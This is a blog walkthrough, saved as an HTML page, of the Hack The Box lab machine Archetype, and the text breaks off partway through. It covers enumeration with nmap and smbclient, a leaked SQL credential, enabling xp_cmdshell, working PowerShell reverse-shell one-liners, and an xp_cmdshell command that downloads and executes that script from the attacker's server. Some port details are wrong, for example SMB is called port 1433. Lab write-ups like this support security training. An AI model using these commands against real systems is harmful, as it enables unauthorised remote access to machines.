<!DOCTYPE html>
<html ⚡>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">

    <title>Archetype Walkthrough | HTB</title>

    <meta name="description" content="Here I will begin with the path of &quot;Starting Point&quot;. Basically it’s a series of 9 machines rated as &quot;Very Easy&quot; and should be rooted in a sequence." />
    <link rel="icon" href="../../favicon.ico" type="image/x-icon" />
    <link rel="canonical" href="../index.html" />
    <meta name="referrer" content="no-referrer-when-downgrade" />
    
    <meta property="og:site_name" content="h4rithd.com" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="Archetype Walkthrough | HTB" />
    <meta property="og:description" content="Here I will begin with the path of &quot;Starting Point&quot;. Basically it’s a series of 9 machines rated as &quot;Very Easy&quot; and should be rooted in a sequence." />
    <meta property="og:url" content="https://h4rithd.com/blog/starting-point-htb-archetype-walkthrough/" />
    <meta property="og:image" content="https://h4rithd.com/blog/content/images/2021/06/ArchetypeBG.jpg" />
    <meta property="article:published_time" content="2021-04-25T15:34:00.000Z" />
    <meta property="article:modified_time" content="2021-06-01T16:37:53.000Z" />
    <meta property="article:tag" content="Starting Point Walkthrough" />
    <meta property="article:tag" content="Harith Dilshan" />
    <meta property="article:tag" content="h4rithd" />
    <meta property="article:tag" content="Archetype Walkthrough" />
    
    <meta property="article:publisher" content="https://www.facebook.com/ShapManasick/" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:title" content="Archetype Walkthrough | HTB" />
    <meta name="twitter:description" content="Here I will begin with the path of &quot;Starting Point&quot;. Basically it’s a series of 9 machines rated as &quot;Very Easy&quot; and should be rooted in a sequence." />
    <meta name="twitter:url" content="https://h4rithd.com/blog/starting-point-htb-archetype-walkthrough/" />
    <meta name="twitter:image" content="https://h4rithd.com/blog/content/images/2021/06/ArchetypeBG.jpg" />
    <meta name="twitter:label1" content="Written by" />
    <meta name="twitter:data1" content="Harith Dilshan" />
    <meta name="twitter:label2" content="Filed under" />
    <meta name="twitter:data2" content="Starting Point Walkthrough, Harith Dilshan, h4rithd, Archetype Walkthrough" />
    <meta name="twitter:site" content="@h4rithd" />
    <meta name="twitter:creator" content="@h4rithd" />
    <meta property="og:image:width" content="1920" />
    <meta property="og:image:height" content="1035" />
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "h4rithd.com",
        "url": "https://h4rithd.com/blog/",
        "logo": {
            "@type": "ImageObject",
            "url": "https://h4rithd.com/blog/content/images/2021/06/Logo.png",
            "width": 60,
            "height": 60
        }
    },
    "author": {
        "@type": "Person",
        "name": "Harith Dilshan",
        "image": {
            "@type": "ImageObject",
            "url": "https://h4rithd.com/blog/content/images/2021/06/ProfilePic.jpg",
            "width": 2000,
            "height": 2000
        },
        "url": "https://h4rithd.com/blog/author/h4rithd/",
        "sameAs": [
            "https://h4rithd.com/",
            "https://twitter.com/h4rithd"
        ]
    },
    "headline": "Archetype Walkthrough | HTB",
    "url": "https://h4rithd.com/blog/starting-point-htb-archetype-walkthrough/",
    "datePublished": "2021-04-25T15:34:00.000Z",
    "dateModified": "2021-06-01T16:37:53.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "https://h4rithd.com/blog/content/images/2021/06/ArchetypeBG.jpg",
        "width": 1920,
        "height": 1035
    },
    "keywords": "Starting Point Walkthrough, Harith Dilshan, h4rithd, Archetype Walkthrough",
    "description": "\n--------------------------------------------------------------------------------\n\nHere I will begin with the path of &quot;Starting Point&quot;. Basically it’s a series of\n9 machines rated as &quot;Very Easy&quot; and should be rooted in a sequence.\n\nThey will provide official walkthroughs for each of 9 machines. As I think it\nwill be very helpful for noob to understand the platform, techniques and more\nabout HTB. And when it comes to noob, no one is here to find zero-day \nvulnerabilities. So from my perspective, ",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://h4rithd.com/blog/"
    }
}
    </script>

    <meta name="generator" content="Ghost 4.6" />
    <link rel="alternate" type="application/rss+xml" title="h4rithd.com" href="../../rss/index.html" />

    <style amp-custom>
    *,
    *::before,
    *::after {
        box-sizing: border-box;
    }

    html {
        overflow-x: hidden;
        overflow-y: scroll;
        font-size: 62.5%;
        -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    }

    body {
        min-height: 100vh;
        margin: 0;
        padding: 0;
        color: #3a4145;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        font-size: 1.7rem;
        line-height: 1.55em;
        font-weight: 400;
        font-style: normal;
        background: #fff;
        scroll-behavior: smooth;
        overflow-x: hidden;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
    }

    p,
    ul,
    ol,
    li,
    dl,
    dd,
    hr,
    pre,
    form,
    table,
    video,
    figure,
    figcaption,
    blockquote {
        margin: 0;
        padding: 0;
    }

    ul[class],
    ol[class] {
        padding: 0;
        list-style: none;
    }

    img {
        display: block;
        max-width: 100%;
    }

    input,
    button,
    select,
    textarea {
        font: inherit;
        -webkit-appearance: none;
    }

    fieldset {
        margin: 0;
        padding: 0;
        border: 0;
    }

    label {
        display: block;
        font-size: 0.9em;
        font-weight: 700;
    }

    hr {
        position: relative;
        display: block;
        width: 100%;
        height: 1px;
        border: 0;
        border-top: 1px solid currentcolor;
        opacity: 0.1;
    }

    ::selection {
        text-shadow: none;
        background: #cbeafb;
    }

    mark {
        background-color: #fdffb6;
    }

    small {
        font-size: 80%;
    }

    sub,
    sup {
        position: relative;
        font-size: 75%;
        line-height: 0;
        vertical-align: baseline;
    }
    sup {
        top: -0.5em;
    }
    sub {
        bottom: -0.25em;
    }

    ul li + li {
        margin-top: 0.6em;
    }

    a {
        color: var(--ghost-accent-color, #1292EE);
        text-decoration-skip-ink: auto;
    }

    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
        margin: 0;
        font-weight: 700;
        color: #121212;
        line-height: 1.4em;
    }

    h1 {
        font-size: 3.4rem;
        line-height: 1.1em;
    }

    h2 {
        font-size: 2.4rem;
        line-height: 1.2em;
    }

    h3 {
        font-size: 1.8rem;
    }

    h4 {
        font-size: 1.7rem;
    }

    h5 {
        font-size: 1.6rem;
    }

    h6 {
        font-size: 1.6rem;
    }

    amp-img {
        height: 100%;
        width: 100%;
        max-width: 100%;
        max-height: 100%;
    }

    amp-img img {
        object-fit: cover;
    }

    .page-header {
        padding: 50px 5vmin 30px;
        text-align: center;
        font-size: 2rem;
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }

    .page-header a {
        color: #121212;
        font-weight: 700;
        text-decoration: none;
        font-size: 1.6rem;
        letter-spacing: -0.1px;
    }

    .post {
        max-width: 680px;
        margin: 0 auto;
    }

    .post-header {
        margin: 0 5vmin 5vmin;
        text-align: center;
    }

    .post-meta {
        margin: 1rem 0 0 0;
        text-transform: uppercase;
        color: #738a94;
        font-weight: 500;
        font-size: 1.3rem;
    }

    .post-image {
        margin: 0 0 5vmin;
    }

    .post-image img {
        display: block;
        width: 100%;
        height: auto;
    }

    .post-content {
        padding: 0 5vmin;
    }

    .post-content > * + * {
        margin-top: 1.5em;
    }

    .post-content [id]:not(:first-child) {
        margin: 2em 0 0;
    }

    .post-content > [id] + * {
        margin-top: 1rem;
    }

    .post-content [id] + .kg-card,
    .post-content blockquote + .kg-card {
        margin-top: 40px;
    }

    .post-content > ul,
    .post-content > ol,
    .post-content > dl {
        padding-left: 1.9em;
    }

    .post-content hr {
        margin-top: 40px;
    }

    .post .post-content hr + * {
        margin-top: 40px;
    }

    .post-content amp-img {
        background-color: #f8f8f8;
    }

    .post-content blockquote {
        position: relative;
        font-style: italic;
    }

    .post-content blockquote::before {
        content: "";
        position: absolute;
        left: -1.5em;
        top: 0;
        bottom: 0;
        width: 0.3rem;
        background: var(--ghost-accent-color, #1292EE);
    }

    .post-content :not(.kg-card):not([id]) + .kg-card {
        margin-top: 40px;
    }

    .post-content .kg-card + :not(.kg-card) {
        margin-top: 40px;
    }

    .kg-card figcaption {
        padding: 1.5rem 1.5rem 0;
        text-align: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.4em;
        opacity: 0.6;
    }

    .kg-card figcaption strong {
        color: rgba(0,0,0,0.8);
    }

    .post-content :not(pre) code {
        vertical-align: middle;
        padding: 0.15em 0.4em 0.15em;
        border: #e1eaef 1px solid;
        font-weight: 400;
        font-size: 0.9em;
        line-height: 1em;
        color: #15171a;
        background: #f0f6f9;
        border-radius: 0.25em;
    }

    .post-content > pre {
        overflow: scroll;
        padding: 16px 20px;
        color: #fff;
        background: #1F2428;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0,0,0,.1), 0 0 1px rgba(0,0,0,.4);
    }

    .kg-embed-card {
        display: flex;
        flex-direction: column;
        align-items: center;
        width: 100%;
    }

    .kg-image-card img {
        margin: auto;
    }

    .kg-gallery-card + .kg-gallery-card {
        margin-top: 0.75em;
    }

    .kg-gallery-container {
        position: relative;
    }

    .kg-gallery-row {
        display: flex;
        flex-direction: row;
        justify-content: center;
    }

    .kg-gallery-image {
        width: 100%;
        height: 100%;
    }

    .kg-gallery-row:not(:first-of-type) {
        margin: 0.75em 0 0 0;
    }

    .kg-gallery-image:not(:first-of-type) {
        margin: 0 0 0 0.75em;
    }

    .kg-bookmark-card,
    .kg-bookmark-publisher {
        position: relative;
    }

    .kg-bookmark-container,
    .kg-bookmark-container:hover {
        display: flex;
        flex-wrap: wrap;
        flex-direction: row-reverse;
        color: currentColor;
        background: rgba(255,255,255,0.6);
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        text-decoration: none;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0, 0, 0, 0.1), 0 0 1px rgba(0, 0, 0, 0.4);
        overflow: hidden;
    }

    .kg-bookmark-content {
        flex-basis: 0;
        flex-grow: 999;
        padding: 20px;
        order: 1;
    }

    .kg-bookmark-title {
        font-weight: 600;
        font-size: 1.5rem;
        line-height: 1.3em;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        max-height: 45px;
        margin: 0.5em 0 0 0;
        font-size: 1.4rem;
        line-height: 1.55em;
        overflow: hidden;
        opacity: 0.8;
        -webkit-line-clamp: 2;
        -webkit-box-orient: vertical;
    }

    .kg-bookmark-metadata {
        margin-top: 20px;
    }

    .kg-bookmark-metadata {
        display: flex;
        align-items: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.3em;
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        -webkit-box-orient: vertical;
        -webkit-line-clamp: 2;
        overflow: hidden;
    }

    .kg-bookmark-metadata amp-img {
        width: 18px;
        height: 18px;
        max-width: 18px;
        max-height: 18px;
        margin-right: 10px;
    }

    .kg-bookmark-thumbnail {
        display: flex;
        flex-basis: 20rem;
        flex-grow: 1;
        justify-content: flex-end;
    }

    .kg-bookmark-thumbnail amp-img {
        max-height: 200px;
    }

    .kg-bookmark-author {
        white-space: nowrap;
        text-overflow: ellipsis;
        overflow: hidden;
    }

    .kg-bookmark-publisher::before {
        content: "•";
        margin: 0 .5em;
    }

    .kg-width-full.kg-card-hascaption {
        display: grid;
        grid-template-columns: inherit;
    }

    .post-content table {
        border-collapse: collapse;
        width: 100%;
    }

    .post-content th {
        padding: 0.5em 0.8em;
        text-align: left;
        font-size: .75em;
        text-transform: uppercase;
    }

    .post-content td {
        padding: 0.4em 0.7em;
    }

    .post-content tbody tr:nth-child(2n + 1) {
        background-color: rgba(0,0,0,0.1);
        padding: 1px;
    }

    .post-content tbody tr:nth-child(2n + 2) td:last-child {
        box-shadow:
            inset 1px 0 rgba(0,0,0,0.1),
            inset -1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:nth-child(2n + 2) td {
        box-shadow: inset 1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:last-child {
        border-bottom: 1px solid rgba(0,0,0,.1);
    }

    .page-footer {
        padding: 60px 5vmin;
        margin: 60px auto 0;
        text-align: center;
        background-color: #f8f8f8;
    }

    .page-footer h3 {
        margin: 0.5rem 0 0 0;
    }

    .page-footer p {
        max-width: 500px;
        margin: 1rem auto 1.5rem;
        font-size: 1.7rem;
        line-height: 1.5em;
        color: rgba(0,0,0,0.6)
    }

    .powered {
        display: inline-flex;
        align-items: center;
        margin: 30px 0 0;
        padding: 6px 9px 6px 6px;
        border: rgba(0,0,0,0.1) 1px solid;
        font-size: 12px;
        line-height: 12px;
        letter-spacing: -0.2px;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        font-weight: 500;
        color: #222;
        text-decoration: none;
        background: #fff;
        border-radius: 6px;
    }

    .powered svg {
        height: 16px;
        width: 16px;
        margin: 0 6px 0 0;
    }

    @media (max-width: 600px) {
        body {
            font-size: 1.6rem;
        }
        h1 {
            font-size: 3rem;
        }

        h2 {
            font-size: 2.2rem;
        }
    }

    @media (max-width: 400px) {
        h1 {
            font-size: 2.6rem;
            line-height: 1.15em;
        }
        h2 {
            font-size: 2rem;
            line-height: 1.2em;
        }
        h3 {
            font-size: 1.7rem;
        }
    }

    :root {--ghost-accent-color: #0065a3;}
    </style>

    <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
    <script async src="https://cdn.ampproject.org/v0.js"></script>

    

</head>

<body class="amp-template">
    <header class="page-header">
        <a href="../../index.html">
                <amp-img class="site-icon" src="https://h4rithd.com/blog/content/images/2021/06/favicon.ico" width="50" height="50" layout="fixed"></amp-img>
        </a>
    </header>

    <main class="content" role="main">
        <article class="post">

            <header class="post-header">
                <h1 class="post-title">Archetype Walkthrough</h1>
                <section class="post-meta">
                    Harith Dilshan -
                    <time class="post-date" datetime="2021-04-25">25 Apr 2021</time>
                </section>
            </header>
            <figure class="post-image">
                <amp-img src="https://h4rithd.com/blog/content/images/2021/06/ArchetypeBG.jpg" width="600" height="340" layout="responsive"></amp-img>
            </figure>
            <section class="post-content">

                <hr></hr><p>Here I will begin with the path of "<strong>Starting Point</strong>". Basically it’s a series of 9 machines rated as "<strong>Very Easy" </strong>and should be rooted in a sequence.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image.png" class="kg-image" alt width="999" height="759" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image.png 600w, https://h4rithd.com/blog/content/images/2021/06/image.png 999w" layout="responsive"></amp-img></figure><p>They will provide official walkthroughs for each of 9 machines. As I think it will be very helpful for noob to understand the platform, techniques and more about HTB. And when it comes to noob, no one is here to find <code>zero-day</code> vulnerabilities. So from my perspective, it's fine to read each and every walkthroughs provided by HTB and others to understand by yourself. <em><em>"Walkthroughs are the teachers".</em></em></p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-1.png" class="kg-image" alt width="1202" height="328" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-1.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-1.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-1.png 1202w" layout="responsive"></amp-img></figure><p>Enough talks 🥱, let's start to hack. 🐱‍💻</p><blockquote><em><strong>Disclaimers:</strong> No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤</em></blockquote>
<div class="elfsight-app-a4de7430-6c0c-44b8-aada-9b9ac759e396"></div><hr></hr><h2 id="00-start-machine-%E2%80%A6"><strong>00. Start Machine …</strong></h2><p>To start the machine, Just click on "<strong>Join Machine</strong>".</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-2.png" class="kg-image" alt width="1000" height="460" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-2.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-2.png 1000w" layout="responsive"></amp-img></figure><p>Then you can see the <strong>IP </strong>address for that machine. <strong>🤠</strong></p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-3.png" class="kg-image" alt width="424" height="442" layout="responsive"></amp-img></figure><p>Before going to enumeration steps we can simply ping to the IP address and check whether the VPN is connected and the machine is alive. Sometimes the machines might "Disable" ping requests when passing through the firewall. But in most cases ping will be a success! 🙂</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-4.png" class="kg-image" alt width="1526" height="554" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-4.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-4.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-4.png 1526w" layout="responsive"></amp-img></figure><p>As a ping result, it's <code>TTL=127</code>. There is one route between machine and us (VPN) so it's definitely it will be <code>Windows</code> machine.</p><hr></hr><h2 id="01-enumeration-first-%E2%80%A6">01. Enumeration First …</h2><h3 id="011-fast-ports-scan"><strong>01.1 Fast ports scan</strong></h3><pre><code class="language-bash">nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27</code></pre><pre><code class="language-bash">-n	: Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable netwok</code></pre><p>Here is the output 👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-5.png" class="kg-image" alt width="1526" height="1030" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-5.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-5.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-5.png 1526w" layout="responsive"></amp-img></figure><p>Here we can see some  <strong>* (Interesting)</strong> ports. others can be avoid.</p><hr></hr><h3 id="012-run-nmap-scripting-engine"><strong>01.2 Run Nmap Scripting Engine</strong></h3><p>To get the best result we can run the <code>Nmap Scripting Engine</code> for all open ports. Now we know all open ports so that we can point out and run the script engine as fast as possible.</p><pre><code class="language-bash">nmap -sV -sC -oN DetailPorts.nmap -p 135,139,455,1433 10.10.10.27</code></pre><pre><code class="language-bash">-sV	: Service fingerprinting
-sC	: Launch default NSE nmap scripts</code></pre><p>Here is the output 👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-6.png" class="kg-image" alt width="1000" height="862" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-6.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-6.png 1000w" layout="responsive"></amp-img></figure><p>Now we know the OS is Windows (Microsoft SQL Server 2017 RTM) and it has SMB (1433) port open. And lets enumerate further. Remember enumerating is the<strong> key!</strong> 🔑</p><h3 id="013-list-all-available-shares">01.3 List all available shares</h3><p>So here it has <code>smb</code> (1433) port open. I used <code>smbclient</code> to list out all the available shares as <code>anonymous</code> user.</p><pre><code class="language-bash">sudo smbclient -N -L 10.10.10.27</code></pre><pre><code class="language-bash">-N	: Don't ask for a password
-L	: Get a list of shares available on a host</code></pre><p>Here is output 👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-7.png" class="kg-image" alt width="1340" height="588" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-7.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-7.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-7.png 1340w" layout="responsive"></amp-img></figure><p>Here we got something very interesting right? There is only single share ‘<strong>backups</strong>’ accessible with no passwords. so let's try to access it and see what's inside.😎😋</p><pre><code class="language-bash">smbclient -N \\\\10.10.10.27\\backups\\</code></pre><p>So now we are done with <code>SMB</code> shell and there is a file called <code>prod.dtsConfig</code>. so let's download it.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-8.png" class="kg-image" alt width="1000" height="308" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-8.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-8.png 1000w" layout="responsive"></amp-img></figure><pre><code class="language-bash">smb: \&gt; dir	: List all directories
smb: \&gt; get	&lt;file-name&gt; : Download file</code></pre><p>Now we can open <code>prod.dtsConfig</code> file and yeah that ‘<strong>prod.dtsConfig</strong>’ file contains a <code>SQL connection string</code>, containing credentials for the local Windows user <strong>ARCHETYPE\sql_svc</strong> 🥂.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-9.png" class="kg-image" alt width="1000" height="273" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-9.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-9.png 1000w" layout="responsive"></amp-img></figure><hr></hr><h2 id="02-lets-get-foothold-%E2%80%A6"><strong>02. Lets get Foothold …</strong></h2><p>Now we have credentials,  Let's try connecting to the SQL Server using <a href="https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/mssqlclient.py" rel="noopener noreferrer">Impacket's </a>mssqlclient.py</p><blockquote><em>Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.source : </em><a href="https://github.com/SecureAuthCorp/impacket" rel="noopener noreferrer"><em>https://github.com/SecureAuthCorp/impacket</em></a></blockquote><h3 id="021-download-and-use-mssqlclientpy"><strong>02.1 Download and use mssqlclient.py</strong></h3><p>First we need to simply <code>wget</code> and download the <code>mssqlclient.py</code> script.</p><pre><code class="language-bash">wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/mssqlclient.py
</code></pre><p>And then run the script and check whether we are working as a <code>sysadmin</code> (privileged user) or not.</p><pre><code class="language-bash">python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth</code></pre><p>Now we can use the <a href="https://docs.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15" rel="noopener noreferrer"><strong>IS_SRVROLEMEMBER </strong></a>function to check whether the current SQL user has <code>sysadmin</code> (highest level) privileges on the SQL Server.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-10.png" class="kg-image" alt width="1000" height="512" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-10.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-10.png 1000w" layout="responsive"></amp-img></figure><p>According to the return value (1 = login is a member of role.) yes we have highest privileges.😁 This will allow us to enable <a href="https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15" rel="noopener noreferrer"><code>xp_cmdshell</code></a> and gain RCE on the host.</p><p>Check below awesome blog posts to understand that trick.</p><ul><li>Pentesting MSSQL - Microsoft SQL Server <a href="https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server" rel="noopener noreferrer">https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server</a></li><li>MySQL Information Gathering <a href="https://sqlwiki.netspi.com/attackQueries/informationGathering/#mysql" rel="noopener noreferrer">https://sqlwiki.netspi.com/attackQueries/informationGathering/#mysql</a></li></ul><h3 id="022-usage-of-xpcmdshell"><strong>02.2 Usage of  xp_cmdshell</strong></h3><p>To get <code>xp_cmdshell</code>, type below commands.</p><pre><code class="language-bash">EXEC sp_configure 'Show Advanced Options', 1; 
reconfigure; 
sp_configure; 
EXEC sp_configure 'xp_cmdshell', 1 
reconfigure; 
xp_cmdshell "whoami"</code></pre><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-11.png" class="kg-image" alt width="1000" height="304" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-11.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-11.png 1000w" layout="responsive"></amp-img></figure><p>However, Now we can run system commands using <code>xp_cmdshell</code>. why can't we get proper shell. 🤠</p><p>Hmmmmah !! what a nice smell for <code>PowerShell Reverse Shell</code> huh! 😍</p><p>You can get some idea about reverse shells from below links,</p><ul><li>Reverse Shell Generator <a href="https://www.revshells.com/" rel="noopener noreferrer">https://www.revshells.com</a>​</li><li>Nishang framework <a href="https://github.com/samratashok/nishang" rel="noopener noreferrer">https://github.com/samratashok/nishang</a>​</li><li>TCP port communications with PowerShell <a href="https://livebook.manning.com/book/powershell-deep-dives/chapter-4/" rel="noopener noreferrer">https://livebook.manning.com/book/powershell-deep-dives/chapter-4</a>​</li></ul><p>But personally, I like to use Nishang's <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1" rel="noopener noreferrer">Invoke-PowerShellTcpOneLine.ps1</a> to create my rev-shell.</p><p>After deleting all comments and unwanted things, powershell script will be like this. 👇 Remember; Type <strong><strong><code>ifconfig tun0</code> </strong></strong>and replace<strong><strong> YourIP</strong></strong></p><pre><code class="language-bash">$client = New-Object System.Net.Sockets.TCPClient('YourIP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$sm=(New-Object Net.Sockets.TCPClient('YourIP',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2&gt;&amp;1));$sm.Write($st,0,$st.Length)}</code></pre><h3 id="023-get-reverse-shell"><strong>02.3 Get Reverse Shell</strong></h3><p>Now time to get reverse shell. Save above <code>powershell script</code> as anyname.ps1 (here I use script.ps1) and power up python demon webserver. I'm a very lasy man you know 🙄 so here I use <code><a href="https://github.com/sc0tfree/updog" rel="noopener noreferrer">updog</a></code><a href="https://github.com/sc0tfree/updog" rel="noopener noreferrer"> </a>instead of typing long shit in python 😑</p><blockquote><em>Updog is a replacement for Python's </em><code><em>SimpleHTTPServer</em></code><em>. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use HTTP basic auth.source : </em><a href="https://github.com/sc0tfree/updog" rel="noopener noreferrer"><em>https://github.com/sc0tfree/updog</em></a><em>​</em></blockquote><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-12.png" class="kg-image" alt width="1000" height="238" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-12.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-12.png 1000w" layout="responsive"></amp-img></figure><p>To listen the connection, I always use the swiss army knife (<strong><strong>netcat) </strong></strong>tool. personally I do not like to get shell through multi handler (metasploit). Trust me, using <code>netcat</code> tool you can learn a lot of things beyond <code>metaspolit</code>. 👽</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-13.png" class="kg-image" alt width="1000" height="214" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-13.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-13.png 1000w" layout="responsive"></amp-img></figure><hr></hr><h2 id="03-exploit-the-target-%E2%80%A6"><strong>03. Exploit the target …</strong></h2><p>Now we can issue the command to download and execute the reverse shell through <code>xp_cmdshell</code>.</p><pre><code class="language-bash">EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.39:9090/script.ps1") | powershell -noprofile'
